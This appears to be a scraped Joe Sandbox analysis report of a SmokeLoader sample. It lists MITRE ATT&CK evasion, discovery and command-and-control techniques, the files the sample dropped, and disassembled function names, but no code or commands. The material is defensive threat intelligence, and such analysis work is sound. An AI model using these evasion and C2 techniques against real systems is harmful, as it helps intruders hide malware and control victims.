Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 3sfCdeA1H2.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Explorer.EXE_fe8167436d6db6c6d2c4bed5d6f2d2c06e142845_f78a65ed_33b02981-0a51-457e-a865-9a43db5b7119\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9631.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9A87.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9AA8.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002d.db

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002e.db

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Windows[4].json

C:\Users\user\AppData\Roaming\tttcvva

C:\Users\user\AppData\Roaming\tttcvva:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Windows Analysis Report
3sfCdeA1H2.exe

Function 00417090 Relevance: 38.8, APIs: 20, Strings: 2, Instructions: 271
filelibrarypipeCOMMON

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Function 02CDFA88 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 02C9003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Function 00417363 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65
libraryCOMMON

Function 00416D00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Function 02C90E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON